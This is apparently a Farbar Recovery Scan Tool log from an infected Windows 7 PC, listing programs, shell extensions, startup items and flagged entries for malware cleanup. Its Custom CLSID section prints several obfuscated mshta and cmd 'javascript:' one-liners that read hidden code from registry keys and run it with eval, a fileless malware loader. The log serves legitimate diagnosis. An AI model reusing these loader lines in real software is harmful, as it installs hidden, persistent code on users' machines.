2019-07-14 20:21 - 2014-09-21 12:01 - 000000000 ____D C:\Users\richard\AppData\Local\Adobe
2019-07-14 20:04 - 2013-03-13 19:53 - 000000000 ____D C:\Program Files (x86)\Mozilla Maintenance Service
2019-07-14 11:48 - 2016-09-04 04:48 - 000000000 ____D C:\Users\richard\AppData\Roaming\vlc
2019-07-10 22:44 - 2013-08-15 00:44 - 000000000 ____D C:\Windows\system32\MRT
2019-07-10 06:23 - 2014-02-26 04:01 - 000774632 _____ C:\Windows\SysWOW64\PerfStringBackup.INI
2019-07-10 06:23 - 2009-07-14 00:13 - 000774632 _____ C:\Windows\system32\PerfStringBackup.INI
2019-07-10 04:32 - 2009-07-13 22:20 - 000000000 ____D C:\Windows\rescache
2019-07-10 03:32 - 2016-11-21 21:00 - 000000000 ____D C:\Users\richard\AppData\Local\2b9a
2019-07-10 03:28 - 2009-07-13 23:45 - 000410928 _____ C:\Windows\system32\FNTCACHE.DAT
2019-07-10 03:23 - 2014-12-10 07:36 - 000000000 ____D C:\Windows\system32\appraiser
2019-07-10 03:23 - 2014-05-06 03:00 - 000000000 ___SD C:\Windows\system32\CompatTel
2019-07-10 03:23 - 2009-07-13 22:20 - 000000000 ____D C:\Windows\SysWOW64\Dism
2019-07-10 03:23 - 2009-07-13 22:20 - 000000000 ____D C:\Windows\system32\Dism
2019-07-10 03:01 - 2012-02-16 16:49 - 136618864 ____C (Microsoft Corporation) C:\Windows\system32\MRT.exe
2019-07-09 15:05 - 2010-11-20 22:27 - 000741432 ____N (Microsoft Corporation) C:\Windows\system32\MpSigStub.exe
2019-06-21 22:16 - 2018-09-12 21:49 - 000004470 _____ C:\Windows\System32\Tasks\Adobe Flash Player NPAPI Notifier
2019-06-21 22:16 - 2013-03-13 20:57 - 000842296 _____ (Adobe) C:\Windows\SysWOW64\FlashPlayerApp.exe
2019-06-21 22:16 - 2013-03-13 20:57 - 000175160 _____ (Adobe) C:\Windows\SysWOW64\FlashPlayerCPLApp.cpl
2019-06-21 22:16 - 2013-03-13 20:57 - 000000000 ____D C:\Windows\SysWOW64\Macromed
2019-06-21 22:16 - 2013-03-13 20:57 - 000000000 ____D C:\Windows\system32\Macromed
2019-06-18 00:48 - 2013-03-25 21:25 - 000000000 ____D C:\Users\richard\AppData\LocalLow\Adobe
 
==================== SigCheck ===============================
 
(There is no automatic fix for files that do not pass verification.)
 
 
LastRegBack: 2019-07-13 06:27
==================== End of FRST.txt ============================
 
 
 
Administrator (S-1-5-21-441904776-594677368-125994074-500 - Administrator - Disabled)
Guest (S-1-5-21-441904776-594677368-125994074-501 - Limited - Enabled)
HomeGroupUser$ (S-1-5-21-441904776-594677368-125994074-1002 - Limited - Enabled)
richard (S-1-5-21-441904776-594677368-125994074-1001 - Administrator - Enabled) => C:\Users\richard
 
==================== Security Center ========================
 
(If an entry is included in the fixlist, it will be removed.)
 
AV: Webroot SecureAnywhere (Enabled - Up to date) {4646A877-74EB-CD3B-8FDB-210DB94FA61A}
AV: Webroot SecureAnywhere (Enabled - Up to date) {DF901FA1-F926-253B-C464-B01C79DCAD48}
AS: Webroot SecureAnywhere (Enabled - Up to date) {FD274993-52D1-C2B5-B56B-1A7FC2C8ECA7}
AS: Windows Defender (Enabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AS: Webroot SecureAnywhere (Enabled - Up to date) {64F1FE45-DF1C-2AB5-FED4-8B6E025BE7F5}
 
==================== Installed Programs ======================
 
(Only the adware programs with "Hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)
 
Adobe Acrobat Reader DC (HKLM-x32\…\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}) (Version: 19.012.20035 - Adobe Systems Incorporated)
Adobe AIR (HKLM-x32\…\Adobe AIR) (Version: 21.0.0.215 - Adobe Systems Incorporated)
Adobe Flash Player 22 ActiveX (HKLM-x32\…\{316462DB-82C6-4856-BA1F-2FDFDC08799F}) (Version: 22.0.0.210 - Adobe Systems Incorporated)
Adobe Flash Player 32 NPAPI (HKLM-x32\…\Adobe Flash Player NPAPI) (Version: 32.0.0.207 - Adobe)
AMD Catalyst Install Manager (HKLM\…\{53A19094-2C04-A9B9-7309-3E92152D4845}) (Version: 8.0.903.0 - Advanced Micro Devices, Inc.)
Asmedia ASM104x USB 3.0 Host Controller Driver (HKLM-x32\…\{E4FB0B39-C991-4EE7-95DD-1A1A7857D33D}) (Version: 1.14.3.0 - Asmedia Technology)
Asmedia ASM106x SATA Host Controller Driver (HKLM-x32\…\{61942EF5-2CD8-47D4-869C-2E9A8BB085F1}) (Version: 1.3.4.000 - Asmedia Technology)
Canon Easy-PhotoPrint EX (HKLM-x32\…\Easy-PhotoPrint EX) (Version:  - )
Canon MG2100 series MP Drivers (HKLM\…\{1199FAD5-9546-44f3-81CF-FFDB8040B7BF}_Canon_MG2100_series) (Version:  - )
Canon MG2100 series On-screen Manual (HKLM-x32\…\Canon MG2100 series On-screen Manual) (Version:  - )
Canon MG2100 series User Registration (HKLM-x32\…\Canon MG2100 series User Registration) (Version:  - )
Canon MP Navigator EX 5.0 (HKLM-x32\…\MP Navigator EX 5.0) (Version:  - )
Canon My Printer (HKLM-x32\…\CanonMyPrinter) (Version:  - )
Canon Solution Menu EX (HKLM-x32\…\CanonSolutionMenuEX) (Version:  - )
CCleaner (HKLM\…\CCleaner) (Version: 5.21 - Piriform)
Cisco EAP-FAST Module (HKLM-x32\…\{64BF0187-F3D2-498B-99EA-163AF9AE6EC9}) (Version: 2.2.14 - Cisco Systems, Inc.)
Cisco LEAP Module (HKLM-x32\…\{51C7AD07-C3F6-4635-8E8A-231306D810FE}) (Version: 1.0.19 - Cisco Systems, Inc.)
Cisco PEAP Module (HKLM-x32\…\{ED5776D5-59B4-46B7-AF81-5F2D94D7C640}) (Version: 1.1.6 - Cisco Systems, Inc.)
Facebook Gameroom 1.21.6876.32656 (HKLM-x32\…\{A94D2051-8788-491C-801D-3965026D2718}) (Version: 1.21.6876.32656 - Facebook)
Fitbit Connect (HKLM-x32\…\{9EC69368-C1C7-48BA-AD93-01EFC142DDF9}) (Version: 2.0.0.6630 - Fitbit Inc.)
Futuremark SystemInfo (HKLM-x32\…\{BEE64C14-BEF1-4610-8A68-A16EAA47B882}) (Version: 4.0.0.0 - Futuremark Corporation)
GameSpy Arcade (HKLM-x32\…\GameSpy Arcade) (Version:  - )
Google Chrome (HKLM-x32\…\Google Chrome) (Version: 75.0.3770.142 - Google LLC)
Google Update Helper (HKLM-x32\…\{60EC980A-BDA2-4CB6-A427-B07A5498B4CA}) (Version: 1.3.34.11 - Google LLC) Hidden
Google Update Helper (HKLM-x32\…\{A92DAB39-4E2C-4304-9AB6-BC44E68B55E2}) (Version: 1.3.25.11 - Google Inc.) Hidden
Intel(R) Control Center (HKLM-x32\…\{F8A9085D-4C7A-41a9-8A77-C8998A96C421}) (Version: 1.2.1.1007 - Intel Corporation)
Intel(R) Management Engine Components (HKLM-x32\…\{65153EA5-8B6E-43B6-857B-C6E4FC25798A}) (Version: 8.1.0.1252 - Intel Corporation)
Intel(R) Network Connections 17.3.63.0 (HKLM\…\PROSetDX) (Version: 17.3.63.0 - Intel)
Intel(R) Rapid Storage Technology (HKLM-x32\…\{3E29EE6C-963A-4aae-86C1-DC237C4A49FC}) (Version: 11.1.0.1006 - Intel Corporation)
Intel(R) USB 3.0 eXtensible Host Controller Driver (HKLM-x32\…\{240C3DDD-C5E9-4029-9DF7-95650D040CF2}) (Version: 1.0.5.235 - Intel Corporation)
Junk Mail filter update (HKLM-x32\…\{8E5233E1-7495-44FB-8DEB-4BE906D59619}) (Version: 14.0.8117.416 - Microsoft Corporation) Hidden
Malwarebytes Anti-Malware version 2.2.1.1043 (HKLM-x32\…\Malwarebytes Anti-Malware_is1) (Version: 2.2.1.1043 - Malwarebytes)
Microsoft .NET Framework 4.7.2 (HKLM\…\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1033) (Version: 4.7.03062 - Microsoft Corporation)
Microsoft Office 2007 Service Pack 3 (SP3) (HKLM-x32\…\{90120000-0011-0000-0000-0000000FF1CE}_PROPLUS_{6E107EB7-8B55-48BF-ACCB-199F86A2CD93}) (Version:  - Microsoft)
Microsoft Office 2010 (HKLM-x32\…\{95140000-0070-0000-0000-0000000FF1CE}) (Version: 14.0.4763.1000 - Microsoft Corporation)
Microsoft Office File Validation Add-In (HKLM-x32\…\{90140000-2005-0000-0000-0000000FF1CE}) (Version: 14.0.5130.5003 - Microsoft Corporation)
Microsoft Office Professional Plus 2007 (HKLM-x32\…\PROPLUS) (Version: 12.0.6612.1000 - Microsoft Corporation)
Microsoft Silverlight (HKLM\…\{89F4137D-6C26-4A84-BDB8-2E5A4BB71E00}) (Version: 5.1.50918.0 - Microsoft Corporation)
Microsoft SQL Server 2005 Compact Edition [ENU] (HKLM-x32\…\{F0B430D1-B6AA-473D-9B06-AA3DD01FD0B8}) (Version: 3.1.0000 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.17 (HKLM\…\{8220EEFE-38CD-377E-8595-13398D740ACE}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 (HKLM\…\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM-x32\…\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\…\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2010  x64 Redistributable - 10.0.40219 (HKLM\…\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2010  x86 Redistributable - 10.0.40219 (HKLM-x32\…\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 (HKLM-x32\…\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 (HKLM-x32\…\{050d4fc8-5d48-4b8f-8972-47c82c46020f}) (Version: 12.0.30501.0 - Microsoft Corporation)
Microsoft Visual C++ 2015 Redistributable (x64) - 14.0.24212 (HKLM-x32\…\{323dad84-0974-4d90-a1c1-e006c7fdbb7d}) (Version: 14.0.24212.0 - Microsoft Corporation)
Mozilla Firefox 68.0 (x64 en-US) (HKLM\…\Mozilla Firefox 68.0 (x64 en-US)) (Version: 68.0 - Mozilla)
Mozilla Maintenance Service (HKLM-x32\…\MozillaMaintenanceService) (Version: 68.0.0.7125 - Mozilla)
MTGArena (HKLM-x32\…\{A8AFE495-9759-494A-9537-BDAD5B3B52F2}) (Version: 0.1.879.0 - Wizards of the Coast)
Open Downloader Manager (HKLM-x32\…\OpenDownloaderManager) (Version:  - Installer Technology Co) <==== ATTENTION
Qualcomm Atheros WiFi Driver Installation (HKLM-x32\…\{7D916FA5-DAE9-4A25-B089-655C70EAF607}) (Version: 3.0 - Qualcomm Atheros)
Ralink RT2860 Wireless LAN Card (HKLM-x32\…\{8FC4F1DD-F7FD-4766-804D-3C8FF1D309AF}) (Version: 1.5.12.0 - Ralink)
Realtek High Definition Audio Driver (HKLM-x32\…\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.1.6699 - Realtek Semiconductor Corp.)
Revo Uninstaller Pro 3.1.6 (HKLM\…\{67579783-0FB7-4F7B-B881-E5BE47C9DBE0}_is1) (Version: 3.1.6 - VS Revo Group, Ltd.)
SAMSUNG USB Driver for Mobile Phones (HKLM\…\{D0795B21-0CDA-4a92-AB9E-6E92D8111E44}) (Version: 1.5.9.0 - SAMSUNG Electronics Co., Ltd.)
Secunia PSI (3.0.0.11005) (HKLM-x32\…\Secunia PSI) (Version: 3.0.0.11005 - Secunia)
UnZipper 1.0.0 (HKLM-x32\…\UnZipper) (Version: 1.0.0 - UnZipper)
Update for 2007 Microsoft Office System (KB967642) (HKLM-x32\…\{90120000-0011-0000-0000-0000000FF1CE}_PROPLUS_{C444285D-5E4F-48A4-91DD-47AAAA68E92D}) (Version:  - Microsoft)
Verizon Wireless Software Upgrade Assistant - Samsung(ar) (HKLM-x32\…\{FD1408CA-47E3-45C8-B7CB-75AEB8F98DA1}) (Version: 2.13.0273 - Samsung Electronics Co., Ltd.)
Verizon Wireless Software Utility Application for Android - Samsung (HKLM-x32\…\{D3D2A5FF-55C2-4A5A-BDAC-A502A66E6B8D}) (Version: 2.13.0246 - Samsung Electronics Co., Ltd.)
VLC media player (HKLM-x32\…\VLC media player) (Version: 2.2.6 - VideoLAN)
Webroot SecureAnywhere (HKLM-x32\…\WRUNINST) (Version: 9.0.26.61 - Webroot)
Windows Live Essentials (HKLM-x32\…\WinLiveSuite_Wave3) (Version: 14.0.8117.0416 - Microsoft Corporation)
Windows Live Sign-in Assistant (HKLM-x32\…\{45338B07-A236-4270-9A77-EBB4115517B5}) (Version: 5.000.818.5 - Microsoft Corporation)
Windows Live Sync (HKLM-x32\…\{B10914FD-8812-47A4-85A1-50FCDE7F1F33}) (Version: 14.0.8117.416 - Microsoft Corporation)
Windows Live Upload Tool (HKLM-x32\…\{205C6BDD-7B73-42DE-8505-9A093F35A238}) (Version: 14.0.8014.1029 - Microsoft Corporation)
 
==================== Custom CLSID (Whitelisted): ==========================
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
HKU\S-1-5-21-441904776-594677368-125994074-1001\Software\Classes\787e: "C:\Windows\system32\mshta.exe" "javascript:AIJx1T="QhYPsMy";V55g=new ActiveXObject("WScript.Shell");G8jVZy6="8KtqGbd";bQw7m=V55g.RegRead("HKCU\\software\\lwtp\\lvheg");h13ixly="vBBMXx";eval(bQw7m);ECn2IB="yXY1k3p";" <==== ATTENTION
HKU\S-1-5-21-441904776-594677368-125994074-1001\Software\Classes\c4ce: "C:\Windows\system32\mshta.exe" "javascript:m7MV5Opd="b3jG";M97P=new ActiveXObject("WScript.Shell");Zk3B9lV="QSBcJLT";VpU0G=M97P.RegRead("HKCU\\software\\lwtp\\lvheg");He3Cg8L="u";eval(VpU0G);Ixd9BN="yaEyof6e";" <==== ATTENTION
HKU\S-1-5-21-441904776-594677368-125994074-1001\Software\Classes\db3bfc: "C:\Windows\system32\mshta.exe" "javascript:zotOh5s="ZcQ2wZ";N58Y=new ActiveXObject("WScript.Shell");t8Bzy7Jy="L";lX7Xk=N58Y.RegRead("HKCU\\software\\cyvpgxzx\\tygozba");djzDV81="qfySpPS";eval(lX7Xk);vmkx1y="9NF";" <==== ATTENTION
HKU\S-1-5-21-441904776-594677368-125994074-1001\Software\Classes\duvremi: cmd.exe /c start "" "C:\Users\richard\AppData\Local\Vadit\mgyltyje.eqmelfiv" "javascript:rlj0j8="Hlo2";W61S=new ActiveXObject("WScript.Shell");ucJHmU5n7="yo";u11chG=W61S.RegRead("HKCU\\software\\cyvpgxzx\\tygozba");PUh9EK="wIC";eval(u11chG);ZvS3jMY6="C8jp";" <==== ATTENTION
HKU\S-1-5-21-441904776-594677368-125994074-1001\Software\Classes\oforah: "C:\Windows\system32\mshta.exe" "javascript:IG6O4p="YuVl30p";uB0=new ActiveXObject("WScript.Shell");eHZw8g1hr="1zkAh";srl4V=uB0.RegRead("HKCU\\software\\cyvpgxzx\\tygozba");y1BTLc="zrIbjEur";eval(srl4V);WbLj6mX8="F5iN";" <==== ATTENTION
ContextMenuHandlers1: [FileAssociationHelper] -> {D5CF14A2-B3CA-49DC-8E3E-0BB233B26D09} => C:\Program Files\File Association Helper\FAHDll.dll [2014-01-28] (WinZip Computing LLC -> Nico Mak Computing)
ContextMenuHandlers1-x32: [UnZipper] -> {73950f91-2061-4ea3-8bd5-49ec4bf08ac2} => C:\Program Files (x86)\UnZipper\UnZipper.dll [2015-11-04] (Tightrope Interactive) [File not signed]
ContextMenuHandlers1: [WRShellExt] -> {69D72956-317C-44bd-B369-8E44D4EF9802} => C:\Windows\system32\WRusr.dll [2019-07-17] (Webroot Inc. -> Webroot)
ContextMenuHandlers3: [MBAMShlExt] -> {57CE581A-0CB6-4266-9CA0-19364C90A0B3} => C:\Program Files (x86)\Malwarebytes Anti-Malware\mbamext.dll [2016-03-10] (Malwarebytes Corporation -> Malwarebytes)
ContextMenuHandlers4-x32: [UnZipper] -> {73950f91-2061-4ea3-8bd5-49ec4bf08ac2} => C:\Program Files (x86)\UnZipper\UnZipper.dll [2015-11-04] (Tightrope Interactive) [File not signed]
ContextMenuHandlers5: [ACE] -> {5E2121EE-0300-11D4-8D3B-444553540000} => C:\Program Files (x86)\ATI Technologies\ATI.ACE\Core-Static\atiacm64.dll [2012-12-19] (Advanced Micro Devices, Inc.) [File not signed]
ContextMenuHandlers6: [MBAMShlExt] -> {57CE581A-0CB6-4266-9CA0-19364C90A0B3} => C:\Program Files (x86)\Malwarebytes Anti-Malware\mbamext.dll [2016-03-10] (Malwarebytes Corporation -> Malwarebytes)
ContextMenuHandlers6: [RUShellExt] -> {2C5515DC-2A7E-4BFD-B813-CACC2B685EB7} => C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RUExt.dll [2012-12-29] (VS Revo Group -> VS Revo Group)
ContextMenuHandlers6: [WRShellExt] -> {69D72956-317C-44bd-B369-8E44D4EF9802} => C:\Windows\system32\WRusr.dll [2019-07-17] (Webroot Inc. -> Webroot)
 
==================== Shortcuts & WMI ========================
 
(The entries could be listed to be restored or removed.)
 
WMI:subscription\__FilterToConsumerBinding->CommandLineEventConsumer.Name=\"BVTConsumer\"",Filter="__EventFilter.Name=\"BVTFilter\"::
WMI:subscription\__EventFilter->BVTFilter::[Query => SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 99]
WMI:subscription\CommandLineEventConsumer->BVTConsumer::[CommandLineTemplate => cscript KernCap.vbs][WorkingDirectory => C:\\tools\\kernrate]
 
Shortcut: C:\Users\richard\AppData\Roaming\Microsoft\Windows\Network Shortcuts\My Web Sites on MSN\target.lnk -> hxxp://www.msnusers.co
 
==================== Loaded Modules (Whitelisted) ==============
 
2013-03-04 06:37 - 2012-02-01 19:25 - 000059904 _____ () [File not signed] C:\Program Files (x86)\Intel\Intel(R) Rapid Storage Technology\IsdiInterop.dll
2018-10-29 19:11 - 2018-10-29 19:11 - 001184256 _____ () [File not signed] C:\Users\richard\AppData\Local\Facebook\Games\CefSharp.Core.dll
2018-10-29 19:11 - 2018-10-29 19:11 - 071641088 _____ () [File not signed] C:\Users\richard\AppData\Local\Facebook\Games\libcef.dll
2019-05-15 03:48 - 2019-05-15 03:48 - 000172032 _____ () [File not signed] C:\Windows\assembly\NativeImages_v2.0.50727_32\IsdiInterop\023b2e749844720d94fa9a591cebbd78\IsdiInterop.ni.dll
2012-12-19 16:14 - 2012-12-19 16:14 - 000837632 _____ (Advanced Micro Devices, Inc.) [File not signed] C:\Program Files (x86)\ATI Technologies\ATI.ACE\Core-Static\atiacm64.dll
2012-12-19 16:14 - 2012-12-19 16:14 - 000004608 _____ (Advanced Micro Devices, Inc.) [File not signed] C:\Program Files (x86)\ATI Technologies\ATI.ACE\Core-Static\atiamenu.dll
2013-03-04 06:36 - 2012-03-31 00:53 - 000114688 ____N (Atheros Communications, Inc.) [File not signed] C:\Program Files (x86)\Qualcomm Atheros WiFi Driver Installation\AthIhvWlanExt.dll
2013-03-04 06:36 - 2012-03-31 00:53 - 000269824 ____N (Atheros Communications, Inc.) [File not signed] c:\program files (x86)\qualcomm atheros wifi driver installation\athihvwpap2p.dll
2013-03-17 15:20 - 2012-03-14 08:00 - 000030208 _____ (CANON INC.) [File not signed] C:\Windows\system32\spool\PRTPROCS\x64\CNMPDAQ.DLL
2013-03-04 06:43 - 2009-05-01 14:51 - 001069056 _____ (Cisco Systems, Inc.) [File not signed] C:\Program Files (x86)\Ralink\Common\CiscoEapFast.dll
2015-09-04 16:43 - 2015-09-04 16:43 - 005750440 ____R (Fitbit, Inc. -> Fitbit, Inc.) [File not signed] C:\Program Files (x86)\Fitbit Connect\FitbitConnectService.exe
2019-05-15 03:48 - 2019-05-15 03:48 - 000014336 _____ (Intel Corp.) [File not signed] C:\Windows\assembly\NativeImages_v2.0.50727_32\IAStorCommon\6dfb43a93bf06432c5ba0b7a8973197c\IAStorCommon.ni.dll
2013-03-04 06:37 - 2012-02-01 19:17 - 000278016 _____ (Intel Corporation) [File not signed] C:\Program Files (x86)\Intel\Intel(R) Rapid Storage Technology\ISDI.dll
2019-05-15 03:48 - 2019-05-15 03:48 - 000228864 _____ (Intel Corporation) [File not signed] C:\Windows\assembly\NativeImages_v2.0.50727_32\IAStorDataMgr\3addc459b592a3e877c7cef64f7692b4\IAStorDataMgr.ni.dll
2019-05-15 03:48 - 2019-05-15 03:48 - 000019968 _____ (Intel Corporation) [File not signed] C:\Windows\assembly\NativeImages_v2.0.50727_32\IAStorDataMgrSvc\6ce56668644b82def19ce6ae4f6ae24a\IAStorDataMgrSvc.ni.exe
2019-05-15 03:48 - 2019-05-15 03:48 - 000488960 _____ (Intel Corporation) [File not signed] C:\Windows\assembly\NativeImages_v2.0.50727_32\IAStorUtil\c399f4c04590f1e91caf42a4cdedd686\IAStorUtil.ni.dll
2013-03-18 01:10 - 2013-03-18 01:10 - 000225280 _____ (Microsoft Corporation) [File not signed] C:\Windows\WinSxS\x86_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.6161_none_50934f2ebcb7eb57\msvcm90.dll
2018-10-29 19:11 - 2018-10-29 19:11 - 000433664 _____ (The Chromium Authors) [File not signed] C:\Users\richard\AppData\Local\Facebook\Games\chrome_elf.dll
2015-09-04 16:34 - 2015-09-04 16:34 - 001374208 ____R (The OpenSSL Project, hxxp://www.openssl.org/) [File not signed] C:\Program Files (x86)\Fitbit Connect\LIBEAY32.dll
2013-12-02 20:49 - 2017-01-27 12:01 - 000910336 ____T (Webroot, Inc.) [File not signed] C:\ProgramData\WRData\PKG\wrPhreshPhish.dll
 
==================== Alternate Data Streams (Whitelisted) =========
 
(If an entry is included in the fixlist, only the ADS will be removed.)
 
 
==================== Safe Mode (Whitelisted) ===================
 
(If an entry is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.)
 
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\WRkrn => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\WRSVC => ""="Service"
 
==================== Association (Whitelisted) ===============
 
(If an entry is included in the fixlist, the registry item will be restored to default or removed.)
 
HKU\.DEFAULT\Software\Classes\exefile: "%1" %* <==== ATTENTION
HKU\.DEFAULT\Software\Classes\.exe: exefile => "%1" %* <==== ATTENTION
HKU\S-1-5-21-441904776-594677368-125994074-1001\Software\Classes\exefile: "%1" %* <==== ATTENTION
HKU\S-1-5-21-441904776-594677368-125994074-1001\Software\Classes\.exe: exefile => "%1" %* <==== ATTENTION
 
==================== Internet Explorer trusted/restricted ===============
 
(If an entry is included in the fixlist, it will be removed from the registry.)
 
 
==================== Hosts content: ===============================
 
(If needed Hosts: directive could be included in the fixlist to reset Hosts.)
 
2009-07-13 21:34 - 2019-06-07 22:33 - 000000047 _____ C:\Windows\system32\drivers\etc\hosts
 
 
==================== Other Areas ============================
 
(Currently there is no automatic fix for this section.)
 
HKLM\System\CurrentControlSet\Control\Session Manager\Environment\\Path -> C:\Program Files (x86)\AMD APP\bin\x86_64;C:\Program Files (x86)\AMD APP\bin\x86;C:\Program Files (x86)\Intel\iCLS Client\;C:\Program Files\Intel\iCLS Client\;%SystemRoot%\system32;%SystemRoot%;%SystemRoot%\System32\Wbem;%SYSTEMROOT%\System32\WindowsPowerShell\v1.0\;C:\Program Files\Intel\Intel(R) Management Engine Components\DAL;C:\Program Files\Intel\Intel(R) Management Engine Components\IPT;C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\DAL;C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\IPT;C:\Program Files (x86)\ATI Technologies\ATI.ACE\Core-Static
HKU\S-1-5-21-441904776-594677368-125994074-1001\Control Panel\Desktop\\Wallpaper -> C:\Users\richard\AppData\Roaming\Microsoft\Windows\Themes\TranscodedWallpaper.jpg
DNS Servers: 192.168.1.254
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: ) (EnableLUA: 1)
Windows Firewall is enabled.
 
==================== MSCONFIG/TASK MANAGER disabled items ==
 
If an entry is included in the fixlist, it will be removed.
 
MSCONFIG\startupfolder: C:^Users^richard^AppData^Roaming^Microsoft^Windows^Start Menu^Programs^Startup^Axis & Allies Registration.lnk => C:\Windows\pss\Axis & Allies Registration.lnk.Startup
MSCONFIG\startupfolder: C:^Users^richard^AppData^Roaming^Microsoft^Windows^Start Menu^Programs^Startup^Launch Utility Application.lnk => C:\Windows\pss\Launch Utility Application.lnk.Startup
MSCONFIG\startupreg: AceStream => C:\Users\richard\AppData\Roaming\ACEStream\engine\ace_engine.exe
MSCONFIG\startupreg: CanonMyPrinter => C:\Program Files\Canon\MyPrinter\BJMyPrt.exe /logon
MSCONFIG\startupreg: CanonSolutionMenuEx => C:\Program Files (x86)\Canon\Solution Menu EX\CNSEMAIN.EXE /logon
MSCONFIG\startupreg: CCleaner Monitoring => "C:\Program Files\CCleaner\CCleaner64.exe" /MONITOR
MSCONFIG\startupreg: FAHConsole => C:\Program Files\File Association Helper\FAHConsole.exe
MSCONFIG\startupreg: Fitbit Connect => "C:\Program Files (x86)\Fitbit Connect\Fitbit Connect.exe" /autorun
MSCONFIG\startupreg: IAStorIcon => C:\Program Files (x86)\Intel\Intel(R) Rapid Storage Technology\IAStorIconLaunch.exe "C:\Program Files (x86)\Intel\Intel(R) Rapid Storage Technology\IAStorIcon.exe" 60
MSCONFIG\startupreg: MouseDriver => TiltWheelMouse.exe
MSCONFIG\startupreg: Open Download Manager => C:\Program Files (x86)\OpenDownloaderManager\odm.exe -autorun
MSCONFIG\startupreg: RtHDVBg_DTS => C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe /DTSU2P 
MSCONFIG\startupreg: RTHDVCPL => C:\Program Files\Realtek\Audio\HDA\RtkNGUI64.exe -s
MSCONFIG\startupreg: StartCCC => "C:\Program Files (x86)\ATI Technologies\ATI.ACE\Core-Static\CLIStart.exe" MSRun
MSCONFIG\startupreg: USB3MON => "C:\Program Files (x86)\Intel\Intel(R) USB 3.0 eXtensible Host Controller Driver\Application\iusb3mon.exe"
MSCONFIG\startupreg: WRSVC => "C:\Program Files\Webroot\WRSA.exe" -ul
 
==================== FirewallRules (Whitelisted) ===============
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
FirewallRules: [{C94B7BBA-7528-4065-A327-32837718CFBA}] => (Allow) C:\Program Files (x86)\Windows Live\Messenger\wlcsdk.exe (Microsoft Corporation -> Microsoft Corporation)
FirewallRules: [{FEBDE4F8-1509-448A-AD50-B7E09C433AF3}] => (Allow) C:\Program Files (x86)\Windows Live\Messenger\msnmsgr.exe (Microsoft Corporation -> Microsoft Corporation)
FirewallRules: [{D780D2D3-2C6E-4A4B-808C-291839ED713A}] => (Allow) svchost.exe (Microsoft Windows -> Microsoft Corporation)
FirewallRules: [{C35302F7-0F1C-4ED8-AB13-F999E2E89E74}] => (Allow) C:\Program Files (x86)\Windows Live\Sync\WindowsLiveSync.exe (Microsoft Corporation -> Microsoft Corporation)
FirewallRules: [{17D78CF6-8C13-4199-B417-A22E79D2E706}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe (Mozilla Corporation -> Mozilla Corporation)
FirewallRules: [{59A21C6F-8BA5-40FF-8610-F36A1BD2C743}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe (Mozilla Corporation -> Mozilla Corporation)
FirewallRules: [{E0D16B7F-53C4-40B2-A4F0-90293F41F232}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe (Mozilla Corporation -> Mozilla Corporation)
FirewallRules: [{D05485F0-F03D-4FBB-AA6B-5895DC166E4B}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe (Mozilla Corporation -> Mozilla Corporation)
FirewallRules: [{E1E8B1FF-3FEB-4C7C-A4CA-1B8730D6AB12}] => (Allow) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google LLC -> Google LLC)
 
==================== Restore Points =========================
 
07-07-2019 23:05:17 Windows Update
10-07-2019 03:00:22 Windows Update
10-07-2019 06:21:28 Windows Update
17-07-2019 08:39:21 Windows Update
 
==================== Faulty Device Manager Devices =============
 
 
==================== Event log errors: =========================
 
Application errors:
==================
Error: (07/17/2019 09:22:18 AM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: FRST64.exe, version: 15.7.2019.1, time stamp: 0x5d2cbf85
Faulting module name: FRST64.exe, version: 15.7.2019.1, time stamp: 0x5d2cbf85
Exception code: 0xc0000005
Fault offset: 0x0000000000026629
Faulting process id: 0x1ec8
Faulting application start time: 0x01d53caaac3a277e
Faulting application path: C:\Users\richard\Desktop\FRST64.exe
Faulting module path: C:\Users\richard\Desktop\FRST64.exe
Report Id: 47f89aed-a89e-11e9-839d-dc85de74e30e
 
